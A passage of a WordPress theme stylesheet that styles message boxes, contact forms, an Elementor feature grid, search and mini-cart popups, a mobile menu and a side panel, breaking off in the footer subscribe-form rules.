    opacity: 0;
  }
  10% {
    transform: scale(1);
    opacity: 1;
  }
  100% {
    transform: scale(1.8);
    opacity: 0;
  }
}
/*--------------------------------------------------------------
## Message Box
--------------------------------------------------------------*/
.ot-message-box {
  padding: 10px;
  overflow: hidden;
  position: relative;
  background: #fff;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.ot-message-box .icon-main {
  float: left;
  font-size: 20px;
  width: 46px;
  height: 46px;
  line-height: 46px;
  text-align: center;
  color: #fff;
  background: #fe8423;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.ot-message-box .icon-main svg {
  height: 30px;
  margin-top: 8px;
  fill: #fff;
}
.ot-message-box .content-box {
  padding-left: 66px;
}
.ot-message-box .content-box h6 {
  font-size: 16px;
  margin-bottom: 1px;
}
.ot-message-box .content-box p {
  font-size: 14px;
  margin-bottom: 0;
}
.ot-message-box > i {
  position: absolute;
  top: 24px;
  right: 20px;
  line-height: 1;
  color: #a5b7d2;
  cursor: pointer;
}
.ot-message-box > i:before {
  font-size: 13px;
}

@media (max-width: 600px) {
  .message-box > i {
    top: 15px;
    right: 10px;
  }

  .message-box .content-box p {
    line-height: 1.4;
  }
}
/*--------------------------------------------------------------
## Contact Form
--------------------------------------------------------------*/
.wpcf7 br {
  display: none;
}
.wpcf7 input:not(.wpcf7-submit),
.wpcf7 textarea {
  width: 100%;
  vertical-align: middle;
}
.wpcf7 p {
  display: block;
  margin-bottom: 10px;
}
.wpcf7 p:last-child {
  margin-bottom: 0;
}
.wpcf7 .row {
  margin-left: -5px;
  margin-right: -5px;
}
.wpcf7 .row .col-md-6 {
  padding: 0 5px;
  margin-bottom: 10px;
}
.wpcf7 div.wpcf7-response-output {
  margin: 20px 0 0;
}
.wpcf7 span.wpcf7-not-valid-tip {
  display: none;
}
.wpcf7 .wpcf7-not-valid {
  border-color: #f00;
}
.wpcf7 div.wpcf7-validation-errors,
.wpcf7 div.wpcf7-acceptance-missing {
  background: #f7e700;
  color: #1b1d21;
}

.wpcf7-placeholder-light .wpcf7-form-control::-webkit-input-placeholder {
  /*WebKit browsers*/
  color: #ffffff;
  opacity: 1;
}

.wpcf7-placeholder-light .wpcf7-form-control:-moz-placeholder {
  /*/ Mozilla Firefox 4 to 18 /*/
  color: #ffffff;
  opacity: 1;
}

.wpcf7-placeholder-light .wpcf7-form-control::-moz-placeholder {
  /*/ Mozilla Firefox 19+ /*/
  color: #ffffff;
  opacity: 1;
}

.wpcf7-placeholder-light .wpcf7-form-control:-ms-input-placeholder {
  /*/ Internet Explorer 10+ /*/
  color: #ffffff;
  opacity: 1;
}

.wpcf7-placeholder-dark .wpcf7-form-control::-webkit-input-placeholder {
  /*/ WebKit browsers /*/
  color: #5f5f5f;
  opacity: 1;
}

.wpcf7-placeholder-dark .wpcf7-form-control:-moz-placeholder {
  /*/ Mozilla Firefox 4 to 18 /*/
  color: #5f5f5f;
  opacity: 1;
}

.wpcf7-placeholder-dark .wpcf7-form-control::-moz-placeholder {
  /*/ Mozilla Firefox 19+ /*/
  color: #5f5f5f;
  opacity: 1;
}

.wpcf7-placeholder-dark .wpcf7-form-control:-ms-input-placeholder {
  /*/ Internet Explorer 10+ /*/
  color: #5f5f5f;
  opacity: 1;
}

/*--------------------------------------------------------------
## Background List
--------------------------------------------------------------*/
.features-service-wrapper {
  position: relative;
  width: 100%;
  overflow: hidden;
  display: flex;
  background: #262832;
}
.features-service-wrapper .features-service-item {
  height: 745px;
  position: relative;
  z-index: 2;
  border-right: 1px solid rgba(255, 255, 255, 0.5);
  flex-basis: 0;
  flex-grow: 1;
}
.features-service-wrapper .features-service-item .features-service-content {
  font-family: "Inter", sans-serif;
  display: flex;
  height: 100%;
  flex-direction: column;
  justify-content: flex-end;
  padding: 50px;
  color: #fff;
}
.features-service-wrapper .features-service-item .features-service-content .features-service-title {
  transition: transform 0.3s ease;
  -webkit-transition: transform 0.3s ease;
  -moz-transition: transform 0.3s ease;
  -o-transition: transform 0.3s ease;
  -ms-transition: transform 0.3s ease;
}
.features-service-wrapper .features-service-item .features-service-content .features-service-title h4 {
  color: #fff;
  margin-bottom: 0;
  font-weight: 600;
}
.features-service-wrapper .features-service-item .features-service-content .features-service-title span {
  font-size: 24px;
  display: block;
  line-height: 1;
  margin-bottom: 20px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.features-service-wrapper .features-service-item .features-service-content .features-service-desc {
  overflow: hidden;
  font-family: "Open Sans", sans-serif;
}
.features-service-wrapper .features-service-item .features-service-content .features-service-desc p {
  margin-top: 15px;
  margin-bottom: 0;
}
.features-service-wrapper .features-service-item .features-service-content .features-service-link {
  justify-content: flex-start;
}
.features-service-wrapper .features-service-item:nth-last-child(2) {
  border-right: 0;
}
.features-service-wrapper .features-service-item .features-service-img-reposive {
  display: none;
  background-size: cover;
  background-repeat: no-repeat;
}
.features-service-wrapper .features-service-item .features-service-overlay {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-color: rgba(38, 40, 50, 0.8);
  z-index: -1;
  opacity: 0;
  visibility: hidden;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.features-service-wrapper .features-service-img {
  position: absolute;
  top: 0;
  left: 0;
  height: 100%;
  width: 100%;
  z-index: 0;
  overflow: hidden;
  visibility: hidden;
  opacity: 0;
  transition: all 0.5s;
}
.features-service-wrapper .features-service-img img {
  width: 100% !important;
  height: 100% !important;
  object-fit: cover;
}
.features-service-wrapper .features-service-img.hover {
  opacity: 1;
  visibility: visible;
  -webkit-transform: scale(1.05);
  -ms-transform: scale(1.05);
  transform: scale(1.05);
}
.features-service-wrapper .btn-details {
  position: relative;
  background: transparent;
  border: 1px solid rgba(255, 255, 255, 0.5);
  min-width: 46px;
  height: 46px;
  font-size: 13px;
  text-transform: uppercase;
  color: #fff;
  overflow: hidden;
  margin-top: 32px;
  padding-right: 20px;
}
.features-service-wrapper .btn-details .btn-text {
  opacity: 0;
  text-indent: -81px;
  vertical-align: middle;
  position: relative;
  line-height: 45px;
  transform: translateX(-5px);
  display: inline-block;
  font-weight: 600;
  -webkit-transition: opacity 0s cubic-bezier(0.05, 0.43, 0.04, 0.87) 0s, text-indent 0.2s ease-in-out;
  -o-transition: opacity 0s cubic-bezier(0.05, 0.43, 0.04, 0.87) 0s, text-indent 0.2s ease-in-out;
  transition: opacity 0s cubic-bezier(0.05, 0.43, 0.04, 0.87) 0s, text-indent 0.2s ease-in-out;
  will-change: opacity, text-indent, transform;
  -webkit-transform: translateX(-23px);
  -ms-transform: translateX(-23px);
  transform: translateX(-23px);
}
.features-service-wrapper .btn-details i {
  margin: 0;
  line-height: 45px;
  position: absolute;
  left: 0;
  top: 0;
  right: auto;
  width: 46px;
  height: 46px;
}
.features-service-wrapper .btn-details i:before {
  font-size: 18px;
}
.features-service-wrapper .btn-details:hover {
  width: auto;
  background-color: #ff8f3e;
  border-color: #ff8f3e;
}
.features-service-wrapper .btn-details:hover .btn-text {
  opacity: 1;
  text-indent: 45px;
  -webkit-transition: opacity 0.4s cubic-bezier(0.05, 0.43, 0.04, 0.87) 0.2s, text-indent 0.2s ease-in-out, -webkit-transform 0.1s 0.2s cubic-bezier(0, 0.84, 0.09, 0.97);
  -o-transition: opacity 0.4s cubic-bezier(0.05, 0.43, 0.04, 0.87) 0.2s, text-indent 0.2s ease-in-out, transform 0.1s 0.2s cubic-bezier(0, 0.84, 0.09, 0.97);
  transition: opacity 0.4s cubic-bezier(0.05, 0.43, 0.04, 0.87) 0.2s, text-indent 0.2s ease-in-out, transform 0.1s 0.2s cubic-bezier(0, 0.84, 0.09, 0.97);
  transition: opacity 0.4s cubic-bezier(0.05, 0.43, 0.04, 0.87) 0.2s, text-indent 0.2s ease-in-out, transform 0.1s 0.2s cubic-bezier(0, 0.84, 0.09, 0.97), -webkit-transform 0.1s 0.2s cubic-bezier(0, 0.84, 0.09, 0.97);
  -webkit-transform: translateX(0);
  -ms-transform: translateX(0);
  transform: translateX(0);
}

@media only screen and (min-width: 1025px) {
  .features-service-wrapper .features-service-item .features-service-content .features-service-desc {
    opacity: 0;
    visibility: hidden;
    -webkit-transform: translateY(20%);
    -ms-transform: translateY(20%);
    transform: translateY(20%);
    -webkit-transition: opacity 0.2s, -webkit-transform 0s 0.2s;
    -o-transition: transform 0s 0.2s, opacity 0.2s;
    transition: transform 0s 0.2s, opacity 0.2s;
    transition: transform 0s 0.2s, opacity 0.2s, -webkit-transform 0s 0.2s;
  }
  .features-service-wrapper .features-service-item:hover .features-service-desc {
    opacity: 1;
    visibility: visible;
    -webkit-transform: translateY(0);
    -ms-transform: translateY(0);
    transform: translateY(0);
    -webkit-transition: opacity 0.4s cubic-bezier(0.33, 0.02, 0, 0.93) 0.1s, -webkit-transform 0.2s cubic-bezier(0.645, 0.045, 0.355, 1) 0.1s;
    -o-transition: transform 0.2s cubic-bezier(0.645, 0.045, 0.355, 1) 0.1s, opacity 0.4s cubic-bezier(0.33, 0.02, 0, 0.93) 0.1s;
    transition: transform 0.2s cubic-bezier(0.645, 0.045, 0.355, 1) 0.1s, opacity 0.4s cubic-bezier(0.33, 0.02, 0, 0.93) 0.1s;
    transition: transform 0.2s cubic-bezier(0.645, 0.045, 0.355, 1) 0.1s, opacity 0.4s cubic-bezier(0.33, 0.02, 0, 0.93) 0.1s, -webkit-transform 0.2s cubic-bezier(0.645, 0.045, 0.355, 1) 0.1s;
  }
  .features-service-wrapper .features-service-item:hover .features-service-number {
    color: #ff8f3e;
  }
  .features-service-wrapper .features-service-item:hover .features-service-overlay {
    visibility: visible;
    opacity: 1;
  }
}
@media only screen and (max-width: 1024px) {
  .features-service-wrapper {
    display: block;
  }
  .features-service-wrapper .features-service-item {
    display: block;
    width: 100%;
    height: 500px;
    border-right: none;
  }
  .features-service-wrapper .features-service-item .features-service-img-reposive {
    display: block;
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: -1;
  }
  .features-service-wrapper .features-service-item .features-service-overlay {
    display: none;
  }
  .features-service-wrapper .features-service-img {
    display: none;
  }
}
/*--------------------------------------------------------------
## Miscellaneous
--------------------------------------------------------------*/
.site-overlay {
  cursor: url(images/close.png) 16 16, default;
  background: transparent;
  width: 100vw;
  height: 100vh;
  position: fixed;
  top: 0;
  left: 0;
  visibility: hidden;
  opacity: 0;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  z-index: -1;
}

body .elementor-widget:not(:last-child) {
  margin-bottom: 0;
}

div.elementor-widget-heading.elementor-widget-heading .elementor-heading-title {
  color: #1b1d21;
  font-weight: 700;
  font-family: "Inter", sans-serif;
  line-height: 1.2;
}

.elementor-widget-heading h1.elementor-heading-title {
  font-size: 48px;
}

.elementor-widget-heading h2.elementor-heading-title {
  font-size: 42px;
}

.elementor-widget-heading h3.elementor-heading-title {
  font-size: 36px;
}

.elementor-widget-heading h4.elementor-heading-title {
  font-size: 30px;
}

.elementor-widget-heading h5.elementor-heading-title {
  font-size: 24px;
}

.elementor-widget-heading h6.elementor-heading-title {
  font-size: 20px;
}

.elementor-default .elementor-widget-text-editor,
.elementor-default li.elementor-icon-list-item,
.elementor-default li.elementor-icon-list-item a {
  font-family: "Open Sans", sans-serif;
  color: #5f5f5f;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}

.elementor-element .elementor-widget-button .elementor-button {
  font-family: "Inter", sans-serif;
  font-weight: 600;
  font-size: 13px;
  line-height: 1;
  padding: 16px 20px;
  border-radius: 3px;
}

.elementor-section.ml_0 .elementor-container {
  margin-left: 0 !important;
}

.elementor-section.mr_0 .elementor-container {
  margin-right: 0 !important;
}

.elementor_library-template-default .post-author-box,
.elementor_library-template-default .post-navigation {
  display: none;
}

.elementor-default .elementor-widget-text-editor p:last-child {
  margin-bottom: 0;
}
.elementor-default .elementor-widget-text-editor .elementor-drop-cap {
  font-family: "Inter", sans-serif;
  font-size: 20px;
  font-weight: 900;
  padding: 10px 13px;
  margin-top: 8px;
  background: #1b1d21;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.elementor-default .elementor-widget-text-editor .elementor-drop-cap span {
  color: #fff;
}

.elementor .elementor-section.elementor-section-boxed > .elementor-container {
  padding: 0 15px;
}

.elementor .elementor-section > .elementor-container > .elementor-row {
  width: auto;
  flex: 100%;
  min-width: 100%;
}

.elementor-section > .elementor-column-gap-default > .elementor-row > .elementor-column > .elementor-element-populated, .elementor-section > .elementor-column-gap-narrow > .elementor-row > .elementor-column > .elementor-element-populated, .elementor-section > .elementor-column-gap-extended > .elementor-row > .elementor-column > .elementor-element-populated {
  padding-top: 0;
  padding-bottom: 0;
}

.elementor .elementor-section > .elementor-column-gap-extended > .elementor-row {
  margin-left: -15px;
  margin-right: -15px;
}
.elementor .elementor-section > .elementor-column-gap-default > .elementor-row {
  margin-left: -10px;
  margin-right: -10px;
}
.elementor .elementor-section > .elementor-column-gap-narrow > .elementor-row {
  margin-left: -5px;
  margin-right: -5px;
}

.elementor .elementor-section-full_width:not(.elementor-inner-section) > .elementor-column-gap-extended > .elementor-row {
  margin-left: 0;
  margin-right: 0;
}

.page-template-template-homepage .elementor-top-section.elementor-section-full_width > .elementor-column-gap-default > .elementor-row, .page-template-template-homepage .elementor-top-section.elementor-section-full_width > .elementor-column-gap-narrow > .elementor-row, .page-template-template-homepage .elementor-top-section.elementor-section-full_width > .elementor-column-gap-extended > .elementor-row, .page-template-template-homepage .elementor-top-section.elementor-section-full_width > .elementor-column-gap-wide > .elementor-row, .page-template-template-homepage .elementor-top-section.elementor-section-full_width > .elementor-column-gap-wider > .elementor-row,
.page-template-template-full-width .elementor-top-section.elementor-section-full_width > .elementor-column-gap-default > .elementor-row,
.page-template-template-full-width .elementor-top-section.elementor-section-full_width > .elementor-column-gap-narrow > .elementor-row,
.page-template-template-full-width .elementor-top-section.elementor-section-full_width > .elementor-column-gap-extended > .elementor-row,
.page-template-template-full-width .elementor-top-section.elementor-section-full_width > .elementor-column-gap-wide > .elementor-row,
.page-template-template-full-width .elementor-top-section.elementor-section-full_width > .elementor-column-gap-wider > .elementor-row,
.page-template-template-home-full-width .elementor-top-section.elementor-section-full_width > .elementor-column-gap-default > .elementor-row,
.page-template-template-home-full-width .elementor-top-section.elementor-section-full_width > .elementor-column-gap-narrow > .elementor-row,
.page-template-template-home-full-width .elementor-top-section.elementor-section-full_width > .elementor-column-gap-extended > .elementor-row,
.page-template-template-home-full-width .elementor-top-section.elementor-section-full_width > .elementor-column-gap-wide > .elementor-row,
.page-template-template-home-full-width .elementor-top-section.elementor-section-full_width > .elementor-column-gap-wider > .elementor-row {
  margin-left: 0;
  margin-right: 0;
}

.ot-flex-column-horizontal .elementor-widget-wrap {
  flex-wrap: nowrap;
}
.ot-flex-column-horizontal .elementor-widget-wrap > .elementor-widget {
  display: flex;
  width: auto;
}

.elementor-section.ml_0 .elementor-container {
  margin-left: 0;
}

@media (max-width: 767px) {
  .page-template-template-homepage .elementor-top-section:not(.elementor-section-full_width) > .elementor-container,
.page-template-template-full-width .elementor-top-section:not(.elementor-section-full_width) > .elementor-container,
.page-template-template-home-full-width .elementor-top-section:not(.elementor-section-full_width) > .elementor-container {
    padding-left: 15px;
    padding-right: 15px;
  }
  .page-template-template-homepage .elementor-top-section:not(.elementor-section-full_width) > .elementor-column-gap-no,
.page-template-template-full-width .elementor-top-section:not(.elementor-section-full_width) > .elementor-column-gap-no,
.page-template-template-home-full-width .elementor-top-section:not(.elementor-section-full_width) > .elementor-column-gap-no {
    padding-left: 0;
    padding-right: 0;
  }

  .elementor-widget-heading h2.elementor-heading-title {
    font-size: 34px;
  }

  .elementor-widget-heading h3.elementor-heading-title {
    font-size: 27px;
  }

  .elementor-widget-heading h4.elementor-heading-title {
    font-size: 21px;
  }
}
@media (min-width: 768px) {
  .elementor .elementor-section.elementor-section-boxed > .elementor-container {
    max-width: 750px;
  }

  .elementor-element .container {
    width: 720px;
    padding: 0;
  }
}
@media (min-width: 992px) {
  .elementor .elementor-section.elementor-section-boxed > .elementor-container {
    max-width: 970px;
  }

  .elementor-element .container {
    width: 940px;
    padding: 0;
  }
}
@media (min-width: 1230px) {
  .elementor .elementor-section.elementor-section-boxed > .elementor-container {
    max-width: 1200px;
  }

  .elementor-element .container {
    width: 1170px;
    padding: 0;
  }
}
@media (min-width: 1230px) {
  .elementor .elementor-section:not(.elementor-section-full_width) > .elementor-column-gap-wide > .elementor-row {
    margin-left: -20px;
    margin-right: -20px;
  }
  .elementor .elementor-section:not(.elementor-section-full_width) > .elementor-column-gap-wide > .elementor-row > .elementor-column > .elementor-element-populated {
    padding-left: 20px;
    padding-right: 20px;
  }
  .elementor .elementor-section:not(.elementor-section-full_width) > .elementor-column-gap-wider > .elementor-row {
    margin-left: -30px;
    margin-right: -30px;
  }
  .elementor .elementor-section:not(.elementor-section-full_width) > .elementor-column-gap-wider > .elementor-row > .elementor-column > .elementor-element-populated {
    padding-left: 30px;
    padding-right: 30px;
  }
}
/*--------------------------------------------------------------
## Search
--------------------------------------------------------------*/
.octf-cta-header {
  position: relative;
  height: 100%;
  display: flex;
  align-items: center;
}
.octf-cta-header .toggle_search {
  cursor: pointer;
}
.octf-cta-header .toggle_search i {
  color: #1b1d21;
  text-align: center;
  display: inline-block;
  vertical-align: middle;
  min-width: 22px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.octf-cta-header .toggle_search i:before, .octf-cta-header .toggle_search i:after {
  font-size: 21px;
}
.octf-cta-header .toggle_search i.ot-flaticon-cancel:before {
  font-size: 18px;
}
.octf-cta-header .h-search-form-field {
  display: none;
  position: absolute;
  z-index: 99;
  top: -webkit-calc(100% + 12px);
  top: expression(100% + 12px);
  top: -moz-calc(100% + 12px);
  top: -o-calc(100% + 12px);
  top: calc(100% + 12px);
  right: -30px;
  width: 340px;
}
.octf-cta-header .h-search-form-field .h-search-form-inner {
  padding: 30px;
  background-color: #fff;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.octf-cta-header .h-search-form-field input {
  background: transparent;
}
.octf-cta-header .h-search-form-field:after {
  content: "";
  position: absolute;
  height: 15px;
  width: 15px;
  top: -5px;
  right: 33px;
  opacity: 1;
  background: #fff;
  -webkit-border-radius: 2px;
  -moz-border-radius: 2px;
  border-radius: 2px;
  -webkit-transform: rotate(45deg);
  -ms-transform: rotate(45deg);
  transform: rotate(45deg);
}
.octf-cta-header .h-search-form-field.show {
  -webkit-animation: searchSlideUp 0.5s cubic-bezier(0.23, 1, 0.32, 1) both;
  animation: searchSlideUp 0.5s cubic-bezier(0.23, 1, 0.32, 1) both;
}

@-webkit-keyframes searchSlideUp {
  from {
    -webkit-transform: translateY(10%);
    transform: translateY(10%);
  }
  to {
    -webkit-transform: translateY(0);
    transform: translateY(0);
  }
}
@keyframes searchSlideUp {
  from {
    -webkit-transform: translateY(10%);
    transform: translateY(10%);
  }
  to {
    -webkit-transform: translateY(0);
    transform: translateY(0);
  }
}
/*--------------------------------------------------------------
## Mini Cart
--------------------------------------------------------------*/
.octf-cart {
  position: relative;
}

.site-header-cart {
  position: absolute;
  visibility: hidden;
  opacity: 0;
  z-index: 10;
  top: -webkit-calc(100% + 12px);
  top: expression(100% + 12px);
  top: -moz-calc(100% + 12px);
  top: -o-calc(100% + 12px);
  top: calc(100% + 12px);
  right: -30px;
  background: #fff;
  color: #1b1d21;
  width: 342px;
  padding: 30px;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-transform: translateY(30px);
  -ms-transform: translateY(30px);
  transform: translateY(30px);
  transition: all 0.3s ease-in-out;
  -webkit-transition: all 0.3s ease-in-out;
  -moz-transition: all 0.3s ease-in-out;
  -o-transition: all 0.3s ease-in-out;
  -ms-transition: all 0.3s ease-in-out;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.site-header-cart .woocommerce-mini-cart__buttons {
  margin-bottom: -15px;
}
.site-header-cart .widget_shopping_cart_content {
  text-align: left;
}
.site-header-cart p {
  margin-bottom: 0;
}
.site-header-cart:after {
  content: "";
  position: absolute;
  height: 15px;
  width: 15px;
  top: -5px;
  right: 33px;
  opacity: 1;
  background: #fff;
  -webkit-border-radius: 2px;
  -moz-border-radius: 2px;
  border-radius: 2px;
  -webkit-transform: rotate(45deg);
  -ms-transform: rotate(45deg);
  transform: rotate(45deg);
}
.site-header-cart:before {
  content: "";
  position: absolute;
  height: 12px;
  width: 100%;
  top: -12px;
  left: 0;
}

.octf-cart:hover .site-header-cart {
  visibility: visible;
  opacity: 1;
  -webkit-transform: translateY(0px);
  -ms-transform: translateY(0px);
  transform: translateY(0px);
}

.ot-minicart {
  position: relative;
  display: inline-block;
  color: #1b1d21;
}
.ot-minicart:hover, .ot-minicart:visited, .ot-minicart:focus {
  color: #1b1d21;
}
.ot-minicart i:before {
  font-size: 22px;
}
.ot-minicart .count {
  position: absolute;
  bottom: 4px;
  left: -6px;
  width: 18px;
  height: 18px;
  line-height: 18px;
  background: #fe8423;
  color: #fff;
  text-align: center;
  font-size: 10px;
  font-weight: 700;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}

@media only screen and (max-width: 1024px) {
  .site-header-cart {
    display: none;
  }
}
/*--------------------------------------------------------------
## Mini Cart
--------------------------------------------------------------*/
.elementor-widget-wp-widget-polylang ul {
  list-style: none;
  margin: 0 -7px;
  padding: 0;
}
.elementor-widget-wp-widget-polylang .lang-item {
  display: inline-block;
  margin: 0 7px;
  font-size: 14px;
  font-weight: 500;
  font-family: "Inter", sans-serif;
}

#lang_choice_wp-widget-polylang {
  border: none;
  background: transparent;
  font-size: 14px;
  font-family: "Inter", sans-serif;
  font-weight: 500;
  text-transform: uppercase;
  padding: 2px 10px 2px 0;
}
#lang_choice_wp-widget-polylang option {
  color: #1b1d21;
  outline: none;
  padding: 10px;
}

.bg-dark #lang_choice_wp-widget-polylang,
.bg-dark .lang-item a {
  color: #fff;
}

/*--------------------------------------------------------------
## Menu Mobie
--------------------------------------------------------------*/
.header-mobile {
  display: none;
}

.header-mobile .is-stuck {
  background-color: #1b1d21;
}

.mmenu-toggle button {
  background: none;
  border: none;
  outline: none;
  padding: 0;
  color: #1b1d21;
}
.mmenu-toggle button i:before {
  font-size: 21px;
}

.mmenu-wrapper {
  position: fixed;
  top: 0;
  bottom: 0;
  right: 0;
  width: 310px;
  height: 100vh;
  overflow-x: hidden;
  z-index: 9999;
  background: #fff;
  -webkit-transform: translateX(100%);
  -ms-transform: translateX(100%);
  transform: translateX(100%);
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.mmenu-wrapper.mmenu-open {
  -webkit-transform: translateX(0);
  -ms-transform: translateX(0);
  transform: translateX(0);
}
.mmenu-wrapper .mmenu-inner {
  top: 0;
  height: 100%;
  width: 327px;
  padding: 20px 52px 35px 35px;
  overflow-x: hidden;
  overflow-y: auto;
  box-sizing: border-box;
}
.mmenu-wrapper .mmenu-close {
  display: block;
  margin-bottom: 10px;
  font-size: 18px;
}
.mmenu-wrapper .mobile_mainmenu {
  margin: 0;
  padding: 0;
  font-family: "Inter", sans-serif;
}
.mmenu-wrapper .mobile-nav {
  min-width: 240px;
}
.mmenu-wrapper .mobile_mainmenu ul {
  position: relative;
  margin: 0;
  padding: 0;
  margin-left: 15px;
}
.mmenu-wrapper .mobile_mainmenu ul {
  display: none;
}
.mmenu-wrapper .mobile_mainmenu li {
  position: relative;
  list-style: none;
}
.mmenu-wrapper .mobile_mainmenu li a {
  padding: 10px 30px 10px 0;
  display: block;
  font-size: 14px;
  font-weight: 500;
  border-bottom: 1px solid rgba(0, 0, 0, 0.1);
}
.mmenu-wrapper .mobile_mainmenu > li.menu-item-has-children .arrow {
  color: #fff;
  position: absolute;
  display: block;
  right: 0;
  top: 0;
  cursor: pointer;
  width: 34px;
  height: auto;
  padding: 7px 12px 7px 0;
  line-height: inherit;
  text-align: right;
  box-sizing: border-box;
}
.mmenu-wrapper .mobile_mainmenu > li.menu-item-has-children .arrow i {
  color: #9397a7;
  display: inline-block;
  line-height: 1;
  -webkit-transition: transform 0.3s ease-in-out;
  -moz-transition: transform 0.3s ease-in-out;
  transition: transform 0.3s ease-in-out;
}
.mmenu-wrapper .mobile_mainmenu > li.menu-item-has-children .arrow i:before {
  font-size: 10px;
}
.mmenu-wrapper .mobile_mainmenu > li.menu-item-has-children .arrow.active i {
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  transform: rotate(90deg);
}
.mmenu-wrapper.on-left {
  right: auto;
  left: 0;
  -webkit-transform: translateX(-100%);
  -ms-transform: translateX(-100%);
  transform: translateX(-100%);
}
.mmenu-wrapper.on-left.mmenu-open {
  -webkit-transform: translateX(0);
  -ms-transform: translateX(0);
  transform: translateX(0);
}
.mmenu-wrapper.on-left .mmenu-close i {
  display: inline-block;
  -webkit-transform: rotate(180deg);
  -moz-transform: rotate(180deg);
  transform: rotate(180deg);
}

.mmenu-active .mmenu-overlay {
  background: rgba(0, 0, 0, 0.7);
  visibility: visible;
  opacity: 1;
  z-index: 9998;
}

@media only screen and (max-width: 1024px) {
  .header-desktop {
    display: none;
  }

  .header-mobile {
    display: block;
  }

  .admin-bar section:not(.is-stuck) .mmenu-wrapper {
    top: 32px;
  }
}
@media only screen and (max-width: 782px) {
  .admin-bar section:not(.is-stuck) .mmenu-wrapper {
    top: 46px;
  }
}
/*--------------------------------------------------------------
## Side Panel
--------------------------------------------------------------*/
.panel-btn {
  line-height: 1;
}
.panel-btn i {
  color: #1b1d21;
  cursor: pointer;
}
.panel-btn i:before {
  font-size: 21px;
}

.admin-bar .side-panel {
  top: 32px;
}

.side-panel {
  width: 400px;
  position: fixed;
  top: 0;
  bottom: 0;
  right: 0;
  background: #fff;
  overflow-x: hidden;
  z-index: 9999;
  -webkit-transform: translateX(100%);
  -ms-transform: translateX(100%);
  transform: translateX(100%);
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.side-panel .side-panel-block {
  height: 100%;
  width: calc(100% + 17px);
  overflow-x: hidden;
  overflow-y: auto;
  box-sizing: border-box;
}
.side-panel .side-panel-close {
  display: block;
  position: absolute;
  right: 30px;
  top: 30px;
  color: #1b1d21;
  font-size: 20px;
  width: 50px;
  height: 50px;
  line-height: 50px;
  font-size: 16px;
  cursor: pointer;
  z-index: 9999;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  background: #f5f5f5;
  text-align: center;
}
.side-panel.on-left {
  right: auto;
  left: 0;
  -webkit-transform: translateX(-100%);
  -ms-transform: translateX(-100%);
  transform: translateX(-100%);
}
.side-panel.on-left.mmenu-open {
  -webkit-transform: translateX(0);
  -ms-transform: translateX(0);
  transform: translateX(0);
}
.side-panel.side-panel-open {
  -webkit-transform: translateX(0);
  -ms-transform: translateX(0);
  transform: translateX(0);
}

.side-panel-active .panel-overlay {
  background: rgba(0, 0, 0, 0.7);
  visibility: visible;
  opacity: 1;
  z-index: 9998;
}

@media only screen and (max-width: 782px) {
  .admin-bar .side-panel {
    top: 46px;
  }
}
/*--------------------------------------------------------------
# Footer
--------------------------------------------------------------*/
/* subscribe email */
.mc4wp-form-fields .subscribe-inner-form {
  position: relative;
}
.mc4wp-form-fields .subscribe-inner-form input[type=email] {
  height: 50px;
  width: 100%;
  background: transparent;
  color: #c0c1c2;
  border-color: rgba(255, 255, 255, 0.3);
  padding: 0 65px 0 20px;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.mc4wp-form-fields .subscribe-inner-form input[type=email]::placeholder {
  color: #c0c1c2;
}
.mc4wp-form-fields .subscribe-inner-form .subscribe-btn-icon {
  background: #31333f;
  border: none;
  outline: none;
  display: block;
  position: absolute;
  right: 5px;
  top: 5px;
  width: 40px;
